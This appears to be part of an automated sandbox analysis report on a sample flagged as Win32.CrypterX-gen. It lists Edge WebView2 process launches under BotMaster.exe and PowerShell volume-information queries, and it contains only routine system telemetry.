                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1736 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:2
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2196 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2488 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_CH" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6386081770 --mojo-platform-channel-handle=3380 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:1
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --disable-gpu-compositing --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_CH" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6388632569 --mojo-platform-channel-handle=3928 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:1
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --disable-gpu-compositing --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_CH" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6390330874 --mojo-platform-channel-handle=4280 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:1
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=4484 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:2
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "c:\program files (x86)\microsoft\edgewebview\application\117.0.2045.47\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=botmaster.exe --webview-exe-version=5.8.0.1 --user-data-dir="c:\users\user\appdata\roaming\botmaster\defaultprofiles\ebwebview" --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --enable-features=mojoipcz --mojo-named-platform-channel-pipe=6256.5040.8042992908347816484
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "c:\program files (x86)\microsoft\edgewebview\application\117.0.2045.47\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=c:\users\user\appdata\roaming\botmaster\defaultprofiles\ebwebview /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=c:\users\user\appdata\roaming\botmaster\defaultprofiles\ebwebview\crashpad --annotation=isofficialbuild=1 --annotation=channel= --annotation=chromium-version=117.0.5938.132 "--annotation=exe=c:\program files (x86)\microsoft\edgewebview\application\117.0.2045.47\msedgewebview2.exe" --annotation=plat=win64 "--annotation=prod=edge webview2" --annotation=ver=117.0.2045.47 --initial-client-data=0x15c,0x160,0x164,0x138,0x170,0x7ffdfb488e88,0x7ffdfb488e98,0x7ffdfb488ea8
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "c:\program files (x86)\microsoft\edgewebview\application\117.0.2045.47\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="c:\users\user\appdata\roaming\botmaster\defaultprofiles\ebwebview" --webview-exe-name=botmaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1736 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=mojoipcz /prefetch:2
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "c:\program files (x86)\microsoft\edgewebview\application\117.0.2045.47\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --noerrdialogs --user-data-dir="c:\users\user\appdata\roaming\botmaster\defaultprofiles\ebwebview" --webview-exe-name=botmaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2196 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=mojoipcz /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "c:\program files (x86)\microsoft\edgewebview\application\117.0.2045.47\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.storageservice --lang=en-gb --service-sandbox-type=service --noerrdialogs --user-data-dir="c:\users\user\appdata\roaming\botmaster\defaultprofiles\ebwebview" --webview-exe-name=botmaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2488 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=mojoipcz /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "c:\program files (x86)\microsoft\edgewebview\application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="c:\users\user\appdata\roaming\botmaster\defaultprofiles\ebwebview" --webview-exe-name=botmaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --first-renderer-process --lang=en-gb --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_ch" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6386081770 --mojo-platform-channel-handle=3380 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=mojoipcz /prefetch:1
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "c:\program files (x86)\microsoft\edgewebview\application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="c:\users\user\appdata\roaming\botmaster\defaultprofiles\ebwebview" --webview-exe-name=botmaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --disable-gpu-compositing --lang=en-gb --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_ch" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6388632569 --mojo-platform-channel-handle=3928 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=mojoipcz /prefetch:1
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "c:\program files (x86)\microsoft\edgewebview\application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="c:\users\user\appdata\roaming\botmaster\defaultprofiles\ebwebview" --webview-exe-name=botmaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --disable-gpu-compositing --lang=en-gb --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_ch" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6390330874 --mojo-platform-channel-handle=4280 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=mojoipcz /prefetch:1
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "c:\program files (x86)\microsoft\edgewebview\application\117.0.2045.47\msedgewebview2.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --noerrdialogs --user-data-dir="c:\users\user\appdata\roaming\botmaster\defaultprofiles\ebwebview" --webview-exe-name=botmaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=waaaaaaaaadoaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaabeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=4484 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=mojoipcz /prefetch:2
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "c:\program files (x86)\microsoft\edgewebview\application\117.0.2045.47\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=c:\users\user\appdata\roaming\botmaster\defaultprofiles\ebwebview /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=c:\users\user\appdata\roaming\botmaster\defaultprofiles\ebwebview\crashpad --annotation=isofficialbuild=1 --annotation=channel= --annotation=chromium-version=117.0.5938.132 "--annotation=exe=c:\program files (x86)\microsoft\edgewebview\application\117.0.2045.47\msedgewebview2.exe" --annotation=plat=win64 "--annotation=prod=edge webview2" --annotation=ver=117.0.2045.47 --initial-client-data=0x15c,0x160,0x164,0x138,0x170,0x7ffdfb488e88,0x7ffdfb488e98,0x7ffdfb488ea8
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "c:\program files (x86)\microsoft\edgewebview\application\117.0.2045.47\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="c:\users\user\appdata\roaming\botmaster\defaultprofiles\ebwebview" --webview-exe-name=botmaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1736 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=mojoipcz /prefetch:2
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "c:\program files (x86)\microsoft\edgewebview\application\117.0.2045.47\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --noerrdialogs --user-data-dir="c:\users\user\appdata\roaming\botmaster\defaultprofiles\ebwebview" --webview-exe-name=botmaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2196 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=mojoipcz /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "c:\program files (x86)\microsoft\edgewebview\application\117.0.2045.47\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.storageservice --lang=en-gb --service-sandbox-type=service --noerrdialogs --user-data-dir="c:\users\user\appdata\roaming\botmaster\defaultprofiles\ebwebview" --webview-exe-name=botmaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2488 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=mojoipcz /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "c:\program files (x86)\microsoft\edgewebview\application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="c:\users\user\appdata\roaming\botmaster\defaultprofiles\ebwebview" --webview-exe-name=botmaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --first-renderer-process --lang=en-gb --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_ch" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6386081770 --mojo-platform-channel-handle=3380 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=mojoipcz /prefetch:1
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "c:\program files (x86)\microsoft\edgewebview\application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="c:\users\user\appdata\roaming\botmaster\defaultprofiles\ebwebview" --webview-exe-name=botmaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --disable-gpu-compositing --lang=en-gb --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_ch" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6388632569 --mojo-platform-channel-handle=3928 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=mojoipcz /prefetch:1
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "c:\program files (x86)\microsoft\edgewebview\application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="c:\users\user\appdata\roaming\botmaster\defaultprofiles\ebwebview" --webview-exe-name=botmaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --disable-gpu-compositing --lang=en-gb --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_ch" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6390330874 --mojo-platform-channel-handle=4280 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=mojoipcz /prefetch:1
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "c:\program files (x86)\microsoft\edgewebview\application\117.0.2045.47\msedgewebview2.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --noerrdialogs --user-data-dir="c:\users\user\appdata\roaming\botmaster\defaultprofiles\ebwebview" --webview-exe-name=botmaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=waaaaaaaaadoaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaabeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=4484 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=mojoipcz /prefetch:2
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
